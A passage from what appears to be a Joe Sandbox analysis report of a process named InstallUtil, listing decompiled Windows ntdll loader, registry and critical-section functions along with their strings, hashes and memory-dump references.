                      • Instruction Fuzzy Hash: 655103322246819FE722EB68CC49F777BE8FF80B54F080568F9559B292D775D800CB66
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                      • API String ID: 2994545307-336120773
                      • Opcode ID: fce3937ceeda2b2a9f05eb29b420178391d55810448c219aea46e531267a1c26
                      • Instruction ID: 50ab2b0be9ae9fc2518e9e39a3ec721ed2857c4b69612bd816a11e1f6a279bb0
                      • Opcode Fuzzy Hash: fce3937ceeda2b2a9f05eb29b420178391d55810448c219aea46e531267a1c26
                      • Instruction Fuzzy Hash: F2314632210306EFE721EB5DC889F67B7ECEF00B68F18415AF5068FA51E6B4A944C759
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E012D8794(void* __ecx) {
                      				signed int _v0;
                      				char _v8;
                      				signed int _v12;
                      				void* _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v40;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr* _t77;
                      				signed int _t80;
                      				signed char _t81;
                      				signed int _t87;
                      				signed int _t91;
                      				void* _t92;
                      				void* _t94;
                      				signed int _t95;
                      				signed int _t103;
                      				signed int _t105;
                      				signed int _t110;
                      				signed int _t118;
                      				intOrPtr* _t121;
                      				intOrPtr _t122;
                      				signed int _t125;
                      				signed int _t129;
                      				signed int _t131;
                      				signed int _t134;
                      				signed int _t136;
                      				signed int _t143;
                      				signed int* _t147;
                      				signed int _t151;
                      				void* _t153;
                      				signed int* _t157;
                      				signed int _t159;
                      				signed int _t161;
                      				signed int _t166;
                      				signed int _t168;
                      
                      				_push(__ecx);
                      				_t153 = __ecx;
                      				_t159 = 0;
                      				_t121 = __ecx + 0x3c;
                      				if( *_t121 == 0) {
                      					L2:
                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                      							L6:
                      							if(E012D934A() != 0) {
                      								_t159 = E0134A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                      								__eflags = _t159;
                      								if(_t159 < 0) {
                      									_t81 =  *0x13b5780; // 0x0
                      									__eflags = _t81 & 0x00000003;
                      									if((_t81 & 0x00000003) != 0) {
                      										_push(_t159);
                      										E01345510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                      										_t81 =  *0x13b5780; // 0x0
                      									}
                      									__eflags = _t81 & 0x00000010;
                      									if((_t81 & 0x00000010) != 0) {
                      										asm("int3");
                      									}
                      								}
                      							}
                      						} else {
                      							_t159 = E012D849B(0, _t122, _t153, _t159, _t180);
                      							if(_t159 >= 0) {
                      								goto L6;
                      							}
                      						}
                      						_t80 = _t159;
                      						goto L8;
                      					} else {
                      						_t125 = 0x13;
                      						asm("int 0x29");
                      						_push(0);
                      						_push(_t159);
                      						_t161 = _t125;
                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                      						_t143 = 0;
                      						_v40 = _t161;
                      						_t118 = 0;
                      						_push(_t153);
                      						__eflags = _t87;
                      						if(_t87 != 0) {
                      							_t118 = _t87 + 0x5d8;
                      							__eflags = _t118;
                      							if(_t118 == 0) {
                      								L46:
                      								_t118 = 0;
                      							} else {
                      								__eflags =  *(_t118 + 0x30);
                      								if( *(_t118 + 0x30) == 0) {
                      									goto L46;
                      								}
                      							}
                      						}
                      						_v32 = 0;
                      						_v28 = 0;
                      						_v16 = 0;
                      						_v20 = 0;
                      						_v12 = 0;
                      						__eflags = _t118;
                      						if(_t118 != 0) {
                      							__eflags = _t161;
                      							if(_t161 != 0) {
                      								__eflags =  *(_t118 + 8);
                      								if( *(_t118 + 8) == 0) {
                      									L22:
                      									_t143 = 1;
                      									__eflags = 1;
                      								} else {
                      									_t19 = _t118 + 0x40; // 0x40
                      									_t156 = _t19;
                      									E012D8999(_t19,  &_v16);
                      									__eflags = _v0;
                      									if(_v0 != 0) {
                      										__eflags = _v0 - 1;
                      										if(_v0 != 1) {
                      											goto L22;
                      										} else {
                      											_t128 =  *(_t161 + 0x64);
                      											__eflags =  *(_t161 + 0x64);
                      											if( *(_t161 + 0x64) == 0) {
                      												goto L22;
                      											} else {
                      												E012D8999(_t128,  &_v12);
                      												_t147 = _v12;
                      												_t91 = 0;
                      												__eflags = 0;
                      												_t129 =  *_t147;
                      												while(1) {
                      													__eflags =  *((intOrPtr*)(0x13b5c60 + _t91 * 8)) - _t129;
                      													if( *((intOrPtr*)(0x13b5c60 + _t91 * 8)) == _t129) {
                      														break;
                      													}
                      													_t91 = _t91 + 1;
                      													__eflags = _t91 - 5;
                      													if(_t91 < 5) {
                      														continue;
                      													} else {
                      														_t131 = 0;
                      														__eflags = 0;
                      													}
                      													L37:
                      													__eflags = _t131;
                      													if(_t131 != 0) {
                      														goto L22;
                      													} else {
                      														__eflags = _v16 - _t147;
                      														if(_v16 != _t147) {
                      															goto L22;
                      														} else {
                      															E012E2280(_t92, 0x13b86cc);
                      															_t94 = E01399DFB( &_v20);
                      															__eflags = _t94 - 1;
                      															if(_t94 != 1) {
                      															}
                      															asm("movsd");
                      															asm("movsd");
                      															asm("movsd");
                      															asm("movsd");
                      															 *_t118 =  *_t118 + 1;
                      															asm("adc dword [ebx+0x4], 0x0");
                      															_t95 = E012F61A0( &_v32);
                      															__eflags = _t95;
                      															if(_t95 != 0) {
                      																__eflags = _v32 | _v28;
                      																if((_v32 | _v28) != 0) {
                      																	_t71 = _t118 + 0x40; // 0x3f
                      																	_t134 = _t71;
                      																	goto L55;
                      																}
                      															}
                      															goto L30;
                      														}
                      													}
                      													goto L56;
                      												}
                      												_t92 = 0x13b5c64 + _t91 * 8;
                      												asm("lock xadd [eax], ecx");
                      												_t131 = (_t129 | 0xffffffff) - 1;
                      												goto L37;
                      											}
                      										}
                      										goto L56;
                      									} else {
                      										_t143 = E012D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                      										__eflags = _t143;
                      										if(_t143 != 0) {
                      											_t157 = _v12;
                      											_t103 = 0;
                      											__eflags = 0;
                      											_t136 =  &(_t157[1]);
                      											 *(_t161 + 0x64) = _t136;
                      											_t151 =  *_t157;
                      											_v20 = _t136;
                      											while(1) {
                      												__eflags =  *((intOrPtr*)(0x13b5c60 + _t103 * 8)) - _t151;
                      												if( *((intOrPtr*)(0x13b5c60 + _t103 * 8)) == _t151) {
                      													break;
                      												}
                      												_t103 = _t103 + 1;
                      												__eflags = _t103 - 5;
                      												if(_t103 < 5) {
                      													continue;
                      												}
                      												L21:
                      												_t105 = E0130F380(_t136, 0x12a1184, 0x10);
                      												__eflags = _t105;
                      												if(_t105 != 0) {
                      													__eflags =  *_t157 -  *_v16;
                      													if( *_t157 >=  *_v16) {
                      														goto L22;
                      													} else {
                      														asm("cdq");
                      														_t166 = _t157[5] & 0x0000ffff;
                      														_t108 = _t157[5] & 0x0000ffff;
                      														asm("cdq");
                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                      														if(__eflags > 0) {
                      															L29:
                      															E012E2280(_t108, 0x13b86cc);
                      															 *_t118 =  *_t118 + 1;
                      															_t42 = _t118 + 0x40; // 0x3f
                      															_t156 = _t42;
                      															asm("adc dword [ebx+0x4], 0x0");
                      															asm("movsd");
                      															asm("movsd");
                      															asm("movsd");
                      															asm("movsd");
                      															_t110 = E012F61A0( &_v32);
                      															__eflags = _t110;
                      															if(_t110 != 0) {
                      																__eflags = _v32 | _v28;
                      																if((_v32 | _v28) != 0) {
                      																	_t134 = _v20;
                      																	L55:
                      																	E01399D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                      																}
                      															}
                      															L30:
                      															 *_t118 =  *_t118 + 1;
                      															asm("adc dword [ebx+0x4], 0x0");
                      															E012DFFB0(_t118, _t156, 0x13b86cc);
                      															goto L22;
                      														} else {
                      															if(__eflags < 0) {
                      																goto L22;
                      															} else {
                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                      																	goto L22;
                      																} else {
                      																	goto L29;
                      																}
                      															}
                      														}
                      													}
                      													goto L56;
                      												}
                      												goto L22;
                      											}
                      											asm("lock inc dword [eax]");
                      											goto L21;
                      										}
                      									}
                      								}
                      							}
                      						}
                      						return _t143;
                      					}
                      				} else {
                      					_push( &_v8);
                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                      					_push(__ecx + 0x40);
                      					_push(_t121);
                      					_push(0xffffffff);
                      					_t80 = E01309A00();
                      					_t159 = _t80;
                      					if(_t159 < 0) {
                      						L8:
                      						return _t80;
                      					} else {
                      						goto L2;
                      					}
                      				}
                      				L56:
                      			}
                      0x01329ca9
                      0x00000000
                      0x01329ca9
                      0x01329ca3
                      0x00000000
                      0x01329c97
                      0x012d897d
                      0x00000000
                      0x012d8974
                      0x012d8988
                      0x012d8992
                      0x012d8996
                      0x00000000
                      0x012d8996
                      0x012d894c
                      0x00000000
                      0x012d8870
                      0x012d887b
                      0x012d887d
                      0x012d887f
                      0x012d8881
                      0x012d8884
                      0x012d8884
                      0x012d8886
                      0x012d8889
                      0x012d888c
                      0x012d888e
                      0x012d8891
                      0x012d8891
                      0x012d8898
                      0x00000000
                      0x00000000
                      0x012d889a
                      0x012d889b
                      0x012d889e
                      0x00000000
                      0x00000000
                      0x012d88a0
                      0x012d88a8
                      0x012d88b0
                      0x012d88b2
                      0x012d88d3
                      0x012d88d5
                      0x00000000
                      0x012d88d7
                      0x012d88db
                      0x012d88dc
                      0x012d88e0
                      0x012d88e8
                      0x012d88ee
                      0x012d88f0
                      0x012d88f3
                      0x012d88fc
                      0x012d8901
                      0x012d8906
                      0x012d890c
                      0x012d890c
                      0x012d890f
                      0x012d8916
                      0x012d8917
                      0x012d8918
                      0x012d8919
                      0x012d891a
                      0x012d891f
                      0x012d8921
                      0x01329c52
                      0x01329c55
                      0x01329c5b
                      0x01329cac
                      0x01329cc0
                      0x01329cc0
                      0x01329c55
                      0x012d8927
                      0x012d8927
                      0x012d892f
                      0x012d8933
                      0x00000000
                      0x012d88f5
                      0x012d88f5
                      0x00000000
                      0x012d88f7
                      0x012d88f7
                      0x012d88fa
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x012d88fa
                      0x012d88f5
                      0x012d88f3
                      0x00000000
                      0x012d88d5
                      0x00000000
                      0x012d88b2
                      0x012d88c9
                      0x00000000
                      0x012d88c9
                      0x012d887f
                      0x012d886a
                      0x012d8857
                      0x012d8852
                      0x012d88bf
                      0x012d88bf
                      0x012d87aa
                      0x012d87ad
                      0x012d87ae
                      0x012d87b4
                      0x012d87b5
                      0x012d87b6
                      0x012d87b8
                      0x012d87bd
                      0x012d87c1
                      0x012d87f4
                      0x012d87fa
                      0x00000000
                      0x00000000
                      0x00000000
                      0x012d87c1
                      0x00000000

                      Strings
                      • minkernel\ntdll\ldrsnap.c, xrefs: 01329C28
                      • LdrpDoPostSnapWork, xrefs: 01329C1E
                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01329C18
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                      • API String ID: 2994545307-1948996284
                      • Opcode ID: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
                      • Instruction ID: 37c9a3f2ab0583ea1b08171b814ef915cc916157650ff6834ceba774ddd0a15c
                      • Opcode Fuzzy Hash: f96b0739967429bcbfa69af71623374260cca592893cc50520fcf3eeeccbeb3b
                      • Instruction Fuzzy Hash: 83910471A2022BDFEF18DF59D481ABAB7B9FF44318F454069EA45AB240E730E901CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E012D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v24;
                      				signed int _t73;
                      				void* _t77;
                      				char* _t82;
                      				char* _t87;
                      				signed char* _t97;
                      				signed char _t102;
                      				intOrPtr _t107;
                      				signed char* _t108;
                      				intOrPtr _t112;
                      				intOrPtr _t124;
                      				intOrPtr _t125;
                      				intOrPtr _t126;
                      
                      				_t107 = __edx;
                      				_v12 = __ecx;
                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                      				_t124 = 0;
                      				_v20 = __edx;
                      				if(E012DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                      					_t112 = _v8;
                      				} else {
                      					_t112 = 0;
                      					_v8 = 0;
                      				}
                      				if(_t112 != 0) {
                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                      						_t124 = 0xc000007b;
                      						goto L8;
                      					}
                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                      					 *(_t125 + 0x34) = _t73;
                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                      						goto L3;
                      					}
                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                      					_t124 = E012CC9A4( *((intOrPtr*)(_t125 + 0x18)));
                      					if(_t124 < 0) {
                      						goto L8;
                      					} else {
                      						goto L3;
                      					}
                      				} else {
                      					L3:
                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                      						L8:
                      						return _t124;
                      					}
                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                      							goto L5;
                      						}
                      						_t102 =  *0x13b5780; // 0x0
                      						if((_t102 & 0x00000003) != 0) {
                      							E01345510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                      							_t102 =  *0x13b5780; // 0x0
                      						}
                      						if((_t102 & 0x00000010) != 0) {
                      							asm("int3");
                      						}
                      						_t124 = 0xc0000428;
                      						goto L8;
                      					}
                      					L5:
                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                      						goto L8;
                      					}
                      					_t77 = _a4 - 0x40000003;
                      					if(_t77 == 0 || _t77 == 0x33) {
                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                      						if(E012E7D50() != 0) {
                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      						} else {
                      							_t82 = 0x7ffe0384;
                      						}
                      						_t108 = 0x7ffe0385;
                      						if( *_t82 != 0) {
                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                      								if(E012E7D50() == 0) {
                      									_t97 = 0x7ffe0385;
                      								} else {
                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      								}
                      								if(( *_t97 & 0x00000020) != 0) {
                      									E01347016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                      								}
                      							}
                      						}
                      						if(_a4 != 0x40000003) {
                      							L14:
                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                      							if(E012E7D50() != 0) {
                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                      							} else {
                      								_t87 = 0x7ffe0384;
                      							}
                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                      								if(E012E7D50() != 0) {
                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                      								}
                      								if(( *_t108 & 0x00000020) != 0) {
                      									E01347016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                      								}
                      							}
                      							goto L8;
                      						} else {
                      							_v16 = _t125 + 0x24;
                      							_t124 = E012FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                      							if(_t124 < 0) {
                      								E012CB1E1(_t124, 0x1490, 0, _v16);
                      								goto L8;
                      							}
                      							goto L14;
                      						}
                      					} else {
                      						goto L8;
                      					}
                      				}
                      			}





















                      Strings
                      • minkernel\ntdll\ldrmap.c, xrefs: 013298A2
                      • LdrpCompleteMapModule, xrefs: 01329898
                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01329891
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                      • API String ID: 0-1676968949
                      • Opcode ID: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
                      • Instruction ID: 6c53e2c5fe37a781ac5bcbeec2d4b0f65b8008fec96fef3bdf16a158bd6c1573
                      • Opcode Fuzzy Hash: 8a6b7ff7726a82dbbb90c96213546c6af37e7916b55ba3123e83e144a32d66f6
                      • Instruction Fuzzy Hash: E6510131A20756DBEB22DB6CC944B6A7BE4EB0031CF0406A9EA519B7D1D7B8ED00C790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E012CE620(void* __ecx, short* __edx, short* _a4) {
                      				char _v16;
                      				char _v20;
                      				intOrPtr _v24;
                      				char* _v28;
                      				char _v32;
                      				char _v36;
                      				char _v44;
                      				signed int _v48;
                      				intOrPtr _v52;
                      				void* _v56;
                      				void* _v60;
                      				char _v64;
                      				void* _v68;
                      				void* _v76;
                      				void* _v84;
                      				signed int _t59;
                      				signed int _t74;
                      				signed short* _t75;
                      				signed int _t76;
                      				signed short* _t78;
                      				signed int _t83;
                      				short* _t93;
                      				signed short* _t94;
                      				short* _t96;
                      				void* _t97;
                      				signed int _t99;
                      				void* _t101;
                      				void* _t102;
                      
                      				_t80 = __ecx;
                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                      				_t96 = __edx;
                      				_v44 = __edx;
                      				_t78 = 0;
                      				_v56 = 0;
                      				if(__ecx == 0 || __edx == 0) {
                      					L28:
                      					_t97 = 0xc000000d;
                      				} else {
                      					_t93 = _a4;
                      					if(_t93 == 0) {
                      						goto L28;
                      					}
                      					_t78 = E012CF358(__ecx, 0xac);
                      					if(_t78 == 0) {
                      						_t97 = 0xc0000017;
                      						L6:
                      						if(_v56 != 0) {
                      							_push(_v56);
                      							E013095D0();
                      						}
                      						if(_t78 != 0) {
                      							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                      						}
                      						return _t97;
                      					}
                      					E0130FA60(_t78, 0, 0x158);
                      					_v48 = _v48 & 0x00000000;
                      					_t102 = _t101 + 0xc;
                      					 *_t96 = 0;
                      					 *_t93 = 0;
                      					E0130BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                      					_v36 = 0x18;
                      					_v28 =  &_v44;
                      					_v64 = 0;
                      					_push( &_v36);
                      					_push(0x20019);
                      					_v32 = 0;
                      					_push( &_v64);
                      					_v24 = 0x40;
                      					_v20 = 0;
                      					_v16 = 0;
                      					_t97 = E01309600();
                      					if(_t97 < 0) {
                      						goto L6;
                      					}
                      					E0130BB40(0,  &_v36, L"InstallLanguageFallback");
                      					_push(0);
                      					_v48 = 4;
                      					_t97 = L012CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                      					if(_t97 >= 0) {
                      						if(_v52 != 1) {
                      							L17:
                      							_t97 = 0xc0000001;
                      							goto L6;
                      						}
                      						_t59 =  *_t78 & 0x0000ffff;
                      						_t94 = _t78;
                      						_t83 = _t59;
                      						if(_t59 == 0) {
                      							L19:
                      							if(_t83 == 0) {
                      								L23:
                      								E0130BB40(_t83, _t102 + 0x24, _t78);
                      								if(L012D43C0( &_v48,  &_v64) == 0) {
                      									goto L17;
                      								}
                      								_t84 = _v48;
                      								 *_v48 = _v56;
                      								if( *_t94 != 0) {
                      									E0130BB40(_t84, _t102 + 0x24, _t94);
                      									if(L012D43C0( &_v48,  &_v64) != 0) {
                      										 *_a4 = _v56;
                      									} else {
                      										_t97 = 0xc0000001;
                      										 *_v48 = 0;
                      									}
                      								}
                      								goto L6;
                      							}
                      							_t83 = _t83 & 0x0000ffff;
                      							while(_t83 == 0x20) {
                      								_t94 =  &(_t94[1]);
                      								_t74 =  *_t94 & 0x0000ffff;
                      								_t83 = _t74;
                      								if(_t74 != 0) {
                      									continue;
                      								}
                      								goto L23;
                      							}
                      							goto L23;
                      						} else {
                      							goto L14;
                      						}
                      						while(1) {
                      							L14:
                      							_t27 =  &(_t94[1]); // 0x2
                      							_t75 = _t27;
                      							if(_t83 == 0x2c) {
                      								break;
                      							}
                      							_t94 = _t75;
                      							_t76 =  *_t94 & 0x0000ffff;
                      							_t83 = _t76;
                      							if(_t76 != 0) {
                      								continue;
                      							}
                      							goto L23;
                      						}
                      						 *_t94 = 0;
                      						_t94 = _t75;
                      						_t83 =  *_t75 & 0x0000ffff;
                      						goto L19;
                      					}
                      				}
                      			}
































                      Strings
                      • @, xrefs: 012CE6C0
                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 012CE68C
                      • InstallLanguageFallback, xrefs: 012CE6DB
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                      • API String ID: 0-1757540487
                      • Opcode ID: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
                      • Instruction ID: 6d661fdf2bac1c1bf22de02c3b1b7348bf8a8483d9a9c172e2b78b666691c99f
                      • Opcode Fuzzy Hash: bdf51ea5f90f2008ee12c4f33d0807c42c62386dc9ef36bad96574bd4eefbebd
                      • Instruction Fuzzy Hash: 1951E7765143569BD715EF28C840ABBB7E8BF88618F05092EFA85E7240F734DA04C792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0135FF60
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: DebugPrintTimes
                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                      • API String ID: 3446177414-1911121157
                      • Opcode ID: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
                      • Instruction ID: 25fd731dad0387685315aecb229341043b4cab031b98e6856db2800b60ecb4fd
                      • Opcode Fuzzy Hash: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
                      • Instruction Fuzzy Hash: 9B112671550144EFDF66DF58C988F98BBB5FF05B08F148058FA0857AA1C7389944CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E012FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                      				char _v5;
                      				signed int _v8;
                      				signed int _v12;
                      				char _v16;
                      				char _v17;
                      				char _v20;
                      				signed int _v24;
                      				char _v28;
                      				char _v32;
                      				signed int _v40;
                      				void* __ecx;
                      				void* __edi;
                      				void* __ebp;
                      				signed int _t73;
                      				intOrPtr* _t75;
                      				signed int _t77;
                      				signed int _t79;
                      				signed int _t81;
                      				intOrPtr _t83;
                      				intOrPtr _t85;
                      				intOrPtr _t86;
                      				signed int _t91;
                      				signed int _t94;
                      				signed int _t95;
                      				signed int _t96;
                      				signed int _t106;
                      				signed int _t108;
                      				signed int _t114;
                      				signed int _t116;
                      				signed int _t118;
                      				signed int _t122;
                      				signed int _t123;
                      				void* _t129;
                      				signed int _t130;
                      				void* _t132;
                      				intOrPtr* _t134;
                      				signed int _t138;
                      				signed int _t141;
                      				signed int _t147;
                      				intOrPtr _t153;
                      				signed int _t154;
                      				signed int _t155;
                      				signed int _t170;
                      				void* _t174;
                      				signed int _t176;
                      				signed int _t177;
                      
                      				_t129 = __ebx;
                      				_push(_t132);
                      				_push(__esi);
                      				_t174 = _t132;
                      				_t73 =  !( *( *(_t174 + 0x18)));
                      				if(_t73 >= 0) {
                      					L5:
                      					return _t73;
                      				} else {
                      					E012DEEF0(0x13b7b60);
                      					_t134 =  *0x13b7b84; // 0x77577b80
                      					_t2 = _t174 + 0x24; // 0x24
                      					_t75 = _t2;
                      					if( *_t134 != 0x13b7b80) {
                      						_push(3);
                      						asm("int 0x29");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						asm("int3");
                      						_push(0x13b7b60);
                      						_t170 = _v8;
                      						_v28 = 0;
                      						_v40 = 0;
                      						_v24 = 0;
                      						_v17 = 0;
                      						_v32 = 0;
                      						__eflags = _t170 & 0xffff7cf2;
                      						if((_t170 & 0xffff7cf2) != 0) {
                      							L43:
                      							_t77 = 0xc000000d;
                      						} else {
                      							_t79 = _t170 & 0x0000000c;
                      							__eflags = _t79;
                      							if(_t79 != 0) {
                      								__eflags = _t79 - 0xc;
                      								if(_t79 == 0xc) {
                      									goto L43;
                      								} else {
                      									goto L9;
                      								}
                      							} else {
                      								_t170 = _t170 | 0x00000008;
                      								__eflags = _t170;
                      								L9:
                      								_t81 = _t170 & 0x00000300;
                      								__eflags = _t81 - 0x300;
                      								if(_t81 == 0x300) {
                      									goto L43;
                      								} else {
                      									_t138 = _t170 & 0x00000001;
                      									__eflags = _t138;
                      									_v24 = _t138;
                      									if(_t138 != 0) {
                      										__eflags = _t81;
                      										if(_t81 != 0) {
                      											goto L43;
                      										} else {
                      											goto L11;
                      										}
                      									} else {
                      										L11:
                      										_push(_t129);
                      										_t77 = E012D6D90( &_v20);
                      										_t130 = _t77;
                      										__eflags = _t130;
                      										if(_t130 >= 0) {
                      											_push(_t174);
                      											__eflags = _t170 & 0x00000301;
                      											if((_t170 & 0x00000301) == 0) {
                      												_t176 = _a8;
                      												__eflags = _t176;
                      												if(__eflags == 0) {
                      													L64:
                      													_t83 =  *[fs:0x18];
                      													_t177 = 0;
                      													__eflags =  *(_t83 + 0xfb8);
                      													if( *(_t83 + 0xfb8) != 0) {
                      														E012D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                      													}
